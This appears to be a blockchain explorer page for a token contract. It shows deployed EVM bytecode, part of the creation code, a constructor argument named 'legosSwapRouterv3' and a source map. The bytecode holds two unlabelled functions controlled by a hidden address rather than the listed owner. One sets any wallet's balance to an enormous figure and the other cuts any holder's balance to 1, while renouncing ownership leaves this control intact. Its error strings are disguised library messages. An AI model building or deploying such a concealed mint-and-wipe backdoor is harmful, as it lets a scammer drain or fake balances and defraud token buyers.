5b505f83856112479190611a0b565b9050809150509392505050565b5f5f82846112629190611a3e565b9050838110156112a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129e90611abb565b60405180910390fd5b8091505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6112f3826112b1565b6112fd81856112bb565b935061130d8185602086016112cb565b611316816112d9565b840191505092915050565b5f6020820190508181035f83015261133981846112e9565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61136e82611345565b9050919050565b61137e81611364565b8114611388575f5ffd5b50565b5f8135905061139981611375565b92915050565b5f819050919050565b6113b18161139f565b81146113bb575f5ffd5b50565b5f813590506113cc816113a8565b92915050565b5f5f604083850312156113e8576113e7611341565b5b5f6113f58582860161138b565b9250506020611406858286016113be565b9150509250929050565b5f8115159050919050565b61142481611410565b82525050565b5f60208201905061143d5f83018461141b565b92915050565b61144c8161139f565b82525050565b5f6020820190506114655f830184611443565b92915050565b5f5f5f6060848603121561148257611481611341565b5b5f61148f8682870161138b565b93505060206114a08682870161138b565b92505060406114b1868287016113be565b9150509250925092565b5f60ff82169050919050565b6114d0816114bb565b82525050565b5f6020820190506114e95f8301846114c7565b92915050565b5f6020828403121561150457611503611341565b5b5f6115118482850161138b565b91505092915050565b61152381611364565b82525050565b5f60208201905061153c5f83018461151a565b92915050565b5f5f6040838503121561155857611557611341565b5b5f6115658582860161138b565b92505060206115768582860161138b565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806115c457607f821691505b6020821081036115d7576115d6611580565b5b50919050565b7f4265616d32304f776e61626c653a2063616c6c6572206973206e6f74207468655f8201527f206f776e65720000000000000000000000000000000000000000000000000000602082015250565b5f6116376026836112bb565b9150611642826115dd565b604082019050919050565b5f6020820190508181035f8301526116648161162b565b9050919050565b5f819050919050565b5f819050919050565b5f61169761169261168d8461166b565b611674565b61139f565b9050919050565b6116a78161167d565b82525050565b5f6020820190506116c05f83018461169e565b92915050565b5f819050919050565b5f6116e96116e46116df846116c6565b611674565b61139f565b9050919050565b6116f9816116cf565b82525050565b5f6020820190506117125f8301846116f0565b92915050565b7f4265616d32304f776e61626c653a206e6577206f776e657220697320746865205f8201527f7a65726f20616464726573730000000000000000000000000000000000000000602082015250565b5f611772602c836112bb565b915061177d82611718565b604082019050919050565b5f6020820190508181035f83015261179f81611766565b9050919050565b7f4265616d696e746572666163653a20617070726f76652066726f6d20746865205f8201527f7a65726f20616464726573730000000000000000000000000000000000000000602082015250565b5f611800602c836112bb565b915061180b826117a6565b604082019050919050565b5f6020820190508181035f83015261182d816117f4565b9050919050565b7f4265616d696e746572666163653a20617070726f766520746f20746865207a655f8201527f726f206164647265737300000000000000000000000000000000000000000000602082015250565b5f61188e602a836112bb565b915061189982611834565b604082019050919050565b5f6020820190508181035f8301526118bb81611882565b9050919050565b7f4265616d696e746572666163653a207472616e736665722066726f6d207468655f8201527f207a65726f206164647265737300000000000000000000000000000000000000602082015250565b5f61191c602d836112bb565b9150611927826118c2565b604082019050919050565b5f6020820190508181035f83015261194981611910565b9050919050565b7f4265616d696e746572666163653a207472616e7366657220746f20746865207a5f8201527f65726f2061646472657373000000000000000000000000000000000000000000602082015250565b5f6119aa602b836112bb565b91506119b582611950565b604082019050919050565b5f6020820190508181035f8301526119d78161199e565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611a158261139f565b9150611a208361139f565b9250828203905081811115611a3857611a376119de565b5b92915050565b5f611a488261139f565b9150611a538361139f565b9250828201905080821115611a6b57611a6a6119de565b5b92915050565b7f536166654265616d3a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f611aa5601b836112bb565b9150611ab082611a71565b602082019050919050565b5f6020820190508181035f830152611ad281611a99565b905091905056fe4265616d696e746572666163653a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4265616d696e746572666163653a207472616e7366657220796f7572736f6c6420657863656564732062616c616e63654265616d696e746572666163653a207472616e7366657220796f7572736f6c64206578636565647320616c6c6f77616e6365a2646970667358221220106087dba22f46044bb1a9501f26b36782d57fbe3359af75d3b2c303f1ad834f64736f6c634300081c0033000000000000000000000000551aa84adb62725d654866803def1459a1b256af

Deployed Bytecode

0x608060405234801561000f575f5ffd5b5060043610610109575f3560e01c80638099423b116100a0578063a457c2d71161006f578063a457c2d7146102a7578063a9059cbb146102d7578063dd62ed3e14610307578063f1cb537a14610337578063f2fde38b1461035357610109565b80638099423b14610231578063893d20e81461024d5780638da5cb5b1461026b57806395d89b411461028957610109565b8063313ce567116100dc578063313ce567146101a957806339509351146101c757806370a08231146101f7578063715018a61461022757610109565b806306fdde031461010d578063095ea7b31461012b57806318160ddd1461015b57806323b872dd14610179575b5f5ffd5b61011561036f565b6040516101229190611321565b60405180910390f35b610145600480360381019061014091906113d2565b6103ff565b604051610152919061142a565b60405180910390f35b61016361041c565b6040516101709190611452565b60405180910390f35b610193600480360381019061018e919061146b565b610425565b6040516101a0919061142a565b60405180910390f35b6101b16104f9565b6040516101be91906114d6565b60405180910390f35b6101e160048036038101906101dc91906113d2565b61050e565b6040516101ee919061142a565b60405180910390f35b610211600480360381019061020c91906114ef565b6105bc565b60405161021e9190611452565b60405180910390f35b61022f610602565b005b61024b600480360381019061024691906114ef565b610739565b005b610255610893565b6040516102629190611529565b60405180910390f35b6102736108a1565b6040516102809190611529565b60405180910390f35b6102916108c8565b60405161029e9190611321565b60405180910390f35b6102c160048036038101906102bc91906113d2565b610958565b6040516102ce919061142a565b60405180910390f35b6102f160048036038101906102ec91906113d2565b610a20565b6040516102fe919061142a565b60405180910390f35b610321600480360381019061031c9190611542565b610a3d565b60405161032e9190611452565b60405180910390f35b610351600480360381019061034c91906114ef565b610abf565b005b61036d600480360381019061036891906114ef565b610c00565b005b60606006805461037e906115ad565b80601f01602080910402602001604051908101604052809291908181526020018280546103aa906115ad565b80156103f55780601f106103cc576101008083540402835291602001916103f5565b820191905f5260205f20905b8154815290600101906020018083116103d857829003601f168201915b5050505050905090565b5f61041261040b610da6565b8484610dad565b6001905092915050565b5f600354905090565b5f610431848484610f70565b6104ee8461043d610da6565b6104e985604051806060016040528060328152602001611b376032913960025f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6104a0610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b600190509392505050565b5f60045f9054906101000a900460ff16905090565b5f6105b261051a610da6565b846105ad8560025f61052a610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b610dad565b6001905092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61060a610da6565b73ffffffffffffffffffffffffffffffffffffffff166106286108a1565b73ffffffffffffffffffffffffffffffffffffffff161461067e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106759061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35f5f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b610741610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c69061164d565b60405180910390fd5b6c0c9f2c9cd04674edea4000000060015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6c0c9f2c9cd04674edea4000000060405161088891906116ad565b60405180910390a350565b5f61089c6108a1565b905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546108d7906115ad565b80601f0160208091040260200160405190810160405280929190818152602001828054610903906115ad565b801561094e5780601f106109255761010080835404028352916020019161094e565b820191905f5260205f20905b81548152906001019060200180831161093157829003601f168201915b5050505050905090565b5f610a16610964610da6565b84610a11856040518060600160405280602d8152602001611ada602d913960025f61098d610da6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b610dad565b6001905092915050565b5f610a33610a2c610da6565b8484610f70565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610ac7610da6565b73ffffffffffffffffffffffffffffffffffffffff1660075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4c9061164d565b60405180910390fd5b6001805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6001604051610bf591906116ff565b60405180910390a350565b610c08610da6565b73ffffffffffffffffffffffffffffffffffffffff16610c266108a1565b73ffffffffffffffffffffffffffffffffffffffff1614610c7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c739061164d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce190611788565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff165f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e1b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1290611816565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e80906118a4565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f639190611452565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610fde576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fd590611932565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361104c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611043906119c0565b60405180910390fd5b6110b681604051806060016040528060308152602001611b076030913960015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546111f29092919063ffffffff16565b60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506111478160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461125490919063ffffffff16565b60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516111e59190611452565b60405180910390a3505050565b5f838311158290611239576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112309190611321565b60405180910390fd5b505f83856112479190611a0b565b9050809150509392505050565b5f5f82846112629190611a3e565b9050838110156112a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161129e90611abb565b60405180910390fd5b8091505092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f6112f3826112b1565b6112fd81856112bb565b935061130d8185602086016112cb565b611316816112d9565b840191505092915050565b5f6020820190508181035f83015261133981846112e9565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61136e82611345565b9050919050565b61137e81611364565b8114611388575f5ffd5b50565b5f8135905061139981611375565b92915050565b5f819050919050565b6113b18161139f565b81146113bb575f5ffd5b50565b5f813590506113cc816113a8565b92915050565b5f5f604083850312156113e8576113e7611341565b5b5f6113f58582860161138b565b9250506020611406858286016113be565b9150509250929050565b5f8115159050919050565b61142481611410565b82525050565b5f60208201905061143d5f83018461141b565b92915050565b61144c8161139f565b82525050565b5f6020820190506114655f830184611443565b92915050565b5f5f5f6060848603121561148257611481611341565b5b5f61148f8682870161138b565b93505060206114a08682870161138b565b92505060406114b1868287016113be565b9150509250925092565b5f60ff82169050919050565b6114d0816114bb565b82525050565b5f6020820190506114e95f8301846114c7565b92915050565b5f6020828403121561150457611503611341565b5b5f6115118482850161138b565b91505092915050565b61152381611364565b82525050565b5f60208201905061153c5f83018461151a565b92915050565b5f5f6040838503121561155857611557611341565b5b5f6115658582860161138b565b92505060206115768582860161138b565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806115c457607f821691505b6020821081036115d7576115d6611580565b5b50919050565b7f4265616d32304f776e61626c653a2063616c6c6572206973206e6f74207468655f8201527f206f776e65720000000000000000000000000000000000000000000000000000602082015250565b5f6116376026836112bb565b9150611642826115dd565b604082019050919050565b5f6020820190508181035f8301526116648161162b565b9050919050565b5f819050919050565b5f819050919050565b5f61169761169261168d8461166b565b611674565b61139f565b9050919050565b6116a78161167d565b82525050565b5f6020820190506116c05f83018461169e565b92915050565b5f819050919050565b5f6116e96116e46116df846116c6565b611674565b61139f565b9050919050565b6116f9816116cf565b82525050565b5f6020820190506117125f8301846116f0565b92915050565b7f4265616d32304f776e61626c653a206e6577206f776e657220697320746865205f8201527f7a65726f20616464726573730000000000000000000000000000000000000000602082015250565b5f611772602c836112bb565b915061177d82611718565b604082019050919050565b5f6020820190508181035f83015261179f81611766565b9050919050565b7f4265616d696e746572666163653a20617070726f76652066726f6d20746865205f8201527f7a65726f20616464726573730000000000000000000000000000000000000000602082015250565b5f611800602c836112bb565b915061180b826117a6565b604082019050919050565b5f6020820190508181035f83015261182d816117f4565b9050919050565b7f4265616d696e746572666163653a20617070726f766520746f20746865207a655f8201527f726f206164647265737300000000000000000000000000000000000000000000602082015250565b5f61188e602a836112bb565b915061189982611834565b604082019050919050565b5f6020820190508181035f8301526118bb81611882565b9050919050565b7f4265616d696e746572666163653a207472616e736665722066726f6d207468655f8201527f207a65726f206164647265737300000000000000000000000000000000000000602082015250565b5f61191c602d836112bb565b9150611927826118c2565b604082019050919050565b5f6020820190508181035f83015261194981611910565b9050919050565b7f4265616d696e746572666163653a207472616e7366657220746f20746865207a5f8201527f65726f2061646472657373000000000000000000000000000000000000000000602082015250565b5f6119aa602b836112bb565b91506119b582611950565b604082019050919050565b5f6020820190508181035f8301526119d78161199e565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611a158261139f565b9150611a208361139f565b9250828203905081811115611a3857611a376119de565b5b92915050565b5f611a488261139f565b9150611a538361139f565b9250828201905080821115611a6b57611a6a6119de565b5b92915050565b7f536166654265616d3a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f611aa5601b836112bb565b9150611ab082611a71565b602082019050919050565b5f6020820190508181035f830152611ad281611a99565b905091905056fe4265616d696e746572666163653a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4265616d696e746572666163653a207472616e7366657220796f7572736f6c6420657863656564732062616c616e63654265616d696e746572666163653a207472616e7366657220796f7572736f6c64206578636565647320616c6c6f77616e6365a2646970667358221220106087dba22f46044bb1a9501f26b36782d57fbe3359af75d3b2c303f1ad834f64736f6c634300081c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000551aa84adb62725d654866803def1459a1b256af

-----Decoded View---------------
Arg [0] : legosSwapRouterv3 (address): 0x551Aa84ADb62725d654866803Def1459A1b256AF

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000551aa84adb62725d654866803def1459a1b256af


Deployed Bytecode Sourcemap

11377:7489:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12670:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14569:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12838:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15231:336;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12346:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15986:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13012:120;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5809:148;;;:::i;:::-;;13981:207;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12183:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5152:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12507:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16732:281;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13800:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14254:158;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13420:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6112:250;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12670:94;12718:13;12751:5;12744:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12670:94;:::o;14569:177::-;14653:4;14670:46;14679:12;:10;:12::i;:::-;14693;14707:8;14670;:46::i;:::-;14734:4;14727:11;;14569:177;;;;:::o;12838:102::-;12893:7;12920:12;;12913:19;;12838:102;:::o;15231:336::-;15334:4;15351:39;15361:6;15369:10;15381:8;15351:9;:39::i;:::-;15401:136;15410:6;15418:12;:10;:12::i;:::-;15432:104;15473:8;15432:104;;;;;;;;;;;;;;;;;:14;:22;15447:6;15432:22;;;;;;;;;;;;;;;:36;15455:12;:10;:12::i;:::-;15432:36;;;;;;;;;;;;;;;;:40;;:104;;;;;:::i;:::-;15401:8;:136::i;:::-;15555:4;15548:11;;15231:336;;;;;:::o;12346:94::-;12398:5;12423:9;;;;;;;;;;;12416:16;;12346:94;:::o;15986:234::-;16075:4;16092:98;16101:12;:10;:12::i;:::-;16115;16129:60;16176:12;16129:14;:28;16144:12;:10;:12::i;:::-;16129:28;;;;;;;;;;;;;;;:42;16158:12;16129:42;;;;;;;;;;;;;;;;:46;;:60;;;;:::i;:::-;16092:8;:98::i;:::-;16208:4;16201:11;;15986:234;;;;:::o;13012:120::-;13080:7;13107:8;:17;13116:7;13107:17;;;;;;;;;;;;;;;;13100:24;;13012:120;;;:::o;5809:148::-;5383:12;:10;:12::i;:::-;5372:23;;:7;:5;:7::i;:::-;:23;;;5364:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;5916:1:::1;5879:40;;5900:6;;;;;;;;;;;5879:40;;;;;;;;;;;;5947:1;5930:6;;:19;;;;;;;;;;;;;;;;;;5809:148::o:0;13981:207::-;13194:12;:10;:12::i;:::-;13179:27;;:11;;;;;;;;;;;:27;;;13171:78;;;;;;;;;;;;:::i;:::-;;;;;;;;;14075:22:::1;14051:8;:21;14060:11;14051:21;;;;;;;;;;;;;;;:46;;;;14153:1;14123:57;;14132:11;14123:57;;;14157:22;14123:57;;;;;;:::i;:::-;;;;;;;;13981:207:::0;:::o;12183:94::-;12235:7;12262;:5;:7::i;:::-;12255:14;;12183:94;:::o;5152:87::-;5198:7;5225:6;;;;;;;;;;;5218:13;;5152:87;:::o;12507:98::-;12557:13;12590:7;12583:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12507:98;:::o;16732:281::-;16820:4;16837:146;16846:12;:10;:12::i;:::-;16860;16874:108;16921:11;16874:108;;;;;;;;;;;;;;;;;:14;:28;16889:12;:10;:12::i;:::-;16874:28;;;;;;;;;;;;;;;:42;16903:12;16874:42;;;;;;;;;;;;;;;;:46;;:108;;;;;:::i;:::-;16837:8;:146::i;:::-;17001:4;16994:11;;16732:281;;;;:::o;13800:175::-;13883:4;13900:45;13910:12;:10;:12::i;:::-;13924:10;13936:8;13900:9;:45::i;:::-;13963:4;13956:11;;13800:175;;;;:::o;14254:158::-;14342:7;14369:14;:21;14384:5;14369:21;;;;;;;;;;;;;;;:35;14391:12;14369:35;;;;;;;;;;;;;;;;14362:42;;14254:158;;;;:::o;13420:164::-;13194:12;:10;:12::i;:::-;13179:27;;:11;;;;;;;;;;;:27;;;13171:78;;;;;;;;;;;;:::i;:::-;;;;;;;;;13513:1:::1;13489:8:::0;:21:::1;13498:11;13489:21;;;;;;;;;;;;;;;:25;;;;13570:1;13540:36;;13549:11;13540:36;;;13574:1;13540:36;;;;;;:::i;:::-;;;;;;;;13420:164:::0;:::o;6112:250::-;5383:12;:10;:12::i;:::-;5372:23;;:7;:5;:7::i;:::-;:23;;;5364:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;6221:1:::1;6201:22;;:8;:22;;::::0;6193:79:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6317:8;6288:38;;6309:6;;;;;;;;;;;6288:38;;;;;;;;;;;;6346:8;6337:6;;:17;;;;;;;;;;;;;;;;;;6112:250:::0;:::o;3722:98::-;3775:7;3802:10;3795:17;;3722:98;:::o;18466:391::-;18584:1;18567:19;;:5;:19;;;18559:76;;;;;;;;;;;;:::i;:::-;;;;;;;;;18678:1;18654:26;;:12;:26;;;18646:81;;;;;;;;;;;;:::i;:::-;;;;;;;;;18786:8;18748:14;:21;18763:5;18748:21;;;;;;;;;;;;;;;:35;18770:12;18748:35;;;;;;;;;;;;;;;:46;;;;18826:12;18810:39;;18819:5;18810:39;;;18840:8;18810:39;;;;;;:::i;:::-;;;;;;;;18466:391;;;:::o;17500:522::-;17619:1;17601:20;;:6;:20;;;17593:78;;;;;;;;;;;;:::i;:::-;;;;;;;;;17712:1;17690:24;;:10;:24;;;17682:80;;;;;;;;;;;;:::i;:::-;;;;;;;;;17810:82;17831:8;17810:82;;;;;;;;;;;;;;;;;:8;:16;17819:6;17810:16;;;;;;;;;;;;;;;;:20;;:82;;;;;:::i;:::-;17791:8;:16;17800:6;17791:16;;;;;;;;;;;;;;;:101;;;;17926:34;17951:8;17926;:20;17935:10;17926:20;;;;;;;;;;;;;;;;:24;;:34;;;;:::i;:::-;17903:8;:20;17912:10;17903:20;;;;;;;;;;;;;;;:57;;;;17993:10;17976:38;;17985:6;17976:38;;;18005:8;17976:38;;;;;;:::i;:::-;;;;;;;;17500:522;;;:::o;8007:178::-;8093:7;8122:1;8117;:6;;8125:12;8109:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;8145:9;8161:1;8157;:5;;;;:::i;:::-;8145:17;;8178:1;8171:8;;;8007:178;;;;;:::o;7180:167::-;7238:7;7254:9;7270:1;7266;:5;;;;:::i;:::-;7254:17;;7291:1;7286;:6;;7278:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;7340:1;7333:8;;;7180:167;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:139::-;376:6;371:3;366;360:23;417:1;408:6;403:3;399:16;392:27;287:139;;;:::o;432:102::-;473:6;524:2;520:7;515:2;508:5;504:14;500:28;490:38;;432:102;;;:::o;540:377::-;628:3;656:39;689:5;656:39;:::i;:::-;711:71;775:6;770:3;711:71;:::i;:::-;704:78;;791:65;849:6;844:3;837:4;830:5;826:16;791:65;:::i;:::-;881:29;903:6;881:29;:::i;:::-;876:3;872:39;865:46;;632:285;540:377;;;;:::o;923:313::-;1036:4;1074:2;1063:9;1059:18;1051:26;;1123:9;1117:4;1113:20;1109:1;1098:9;1094:17;1087:47;1151:78;1224:4;1215:6;1151:78;:::i;:::-;1143:86;;923:313;;;;:::o;1323:117::-;1432:1;1429;1422:12;1569:126;1606:7;1646:42;1639:5;1635:54;1624:65;;1569:126;;;:::o;1701:96::-;1738:7;1767:24;1785:5;1767:24;:::i;:::-;1756:35;;1701:96;;;:::o;1803:122::-;1876:24;1894:5;1876:24;:::i;:::-;1869:5;1866:35;1856:63;;1915:1;1912;1905:12;1856:63;1803:122;:::o;1931:139::-;1977:5;2015:6;2002:20;1993:29;;2031:33;2058:5;2031:33;:::i;:::-;1931:139;;;;:::o;2076:77::-;2113:7;2142:5;2131:16;;2076:77;;;:::o;2159:122::-;2232:24;2250:5;2232:24;:::i;:::-;2225:5;2222:35;2212:63;;2271:1;2268;2261:12;2212:63;2159:122;:::o;2287:139::-;2333:5;2371:6;2358:20;2349:29;;2387:33;2414:5;2387:33;:::i;:::-;2287:139;;;;:::o;2432:474::-;2500:6;2508;2557:2;2545:9;2536:7;2532:23;2528:32;2525:119;;;2563:79;;:::i;:::-;2525:119;2683:1;2708:53;2753:7;2744:6;2733:9;2729:22;2708:53;:::i;:::-;2698:63;;2654:117;2810:2;2836:53;2881:7;2872:6;2861:9;2857:22;2836:53;:::i;:::-;2826:63;;2781:118;2432:474;;;;;:::o;2912:90::-;2946:7;2989:5;2982:13;2975:21;2964:32;;2912:90;;;:::o;3008:109::-;3089:21;3104:5;3089:21;:::i;:::-;3084:3;3077:34;3008:109;;:::o;3123:210::-;3210:4;3248:2;3237:9;3233:18;3225:26;;3261:65;3323:1;3312:9;3308:17;3299:6;3261:65;:::i;:::-;3123:210;;;;:::o;3339:118::-;3426:24;3444:5;3426:24;:::i;:::-;3421:3;3414:37;3339:118;;:::o;3463:222::-;3556:4;3594:2;3583:9;3579:18;3571:26;;3607:71;3675:1;3664:9;3660:17;3651:6;3607:71;:::i;:::-;3463:222;;;;:::o;3691:619::-;3768:6;3776;3784;3833:2;3821:9;3812:7;3808:23;3804:32;3801:119;;;3839:79;;:::i;:::-;3801:119;3959:1;3984:53;4029:7;4020:6;4009:9;4005:22;3984:53;:::i;:::-;3974:63;;3930:117;4086:2;4112:53;4157:7;4148:6;4137:9;4133:22;4112:53;:::i;:::-;4102:63;;4057:118;4214:2;4240:53;4285:7;4276:6;4265:9;4261:22;4240:53;:::i;:::-;4230:63;;4185:118;3691:619;;;;;:::o;4316:86::-;4351:7;4391:4;4384:5;4380:16;4369:27;;4316:86;;;:::o;4408:112::-;4491:22;4507:5;4491:22;:::i;:::-;4486:3;4479:35;4408:112;;:::o;4526:214::-;4615:4;4653:2;4642:9;4638:18;4630:26;;4666:67;4730:1;4719:9;4715:17;4706:6;4666:67;:::i;:::-;4526:214;;;;:::o;4746:329::-;4805:6;4854:2;4842:9;4833:7;4829:23;4825:32;4822:119;;;4860:79;;:::i;:::-;4822:119;4980:1;5005:53;5050:7;5041:6;5030:9;5026:22;5005:53;:::i;:::-;4995:63;;4951:117;4746:329;;;;:::o;5081:118::-;5168:24;5186:5;5168:24;:::i;:::-;5163:3;5156:37;5081:118;;:::o;5205:222::-;5298:4;5336:2;5325:9;5321:18;5313:26;;5349:71;5417:1;5406:9;5402:17;5393:6;5349:71;:::i;:::-;5205:222;;;;:::o;5433:474::-;5501:6;5509;5558:2;5546:9;5537:7;5533:23;5529:32;5526:119;;;5564:79;;:::i;:::-;5526:119;5684:1;5709:53;5754:7;5745:6;5734:9;5730:22;5709:53;:::i;:::